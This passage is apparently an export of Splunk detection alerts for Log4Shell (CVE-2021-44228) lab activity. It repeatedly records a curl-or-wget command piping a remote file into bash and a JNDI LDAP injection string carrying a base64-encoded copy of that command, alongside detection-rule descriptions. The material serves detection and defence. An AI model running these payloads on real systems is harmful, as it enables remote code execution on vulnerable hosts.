Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644554, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="CIS 12", annotations._all="CVE-2021-44228", annotations._all="T1059", annotations._all="DE.CM", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="T1190", annotations._all="PR.DS", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", 
annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642644552, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Reconnaissance", annotations._all="Stage:Execution", annotations._all="Exploitation", annotations._all="T1190", annotations._all="CIS 3", annotations._all="Source:Application Log", annotations._all="CVE-2021-44228", annotations._all="CIS 5", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", 
annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642644554, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="CIS 12", annotations._all="CVE-2021-44228", annotations._all="T1059", annotations._all="DE.CM", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="T1190", annotations._all="PR.DS", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642644552, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Reconnaissance", annotations._all="Stage:Execution", annotations._all="Exploitation", annotations._all="T1190", annotations._all="CIS 3", annotations._all="Source:Application Log", annotations._all="CVE-2021-44228", annotations._all="CIS 5", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
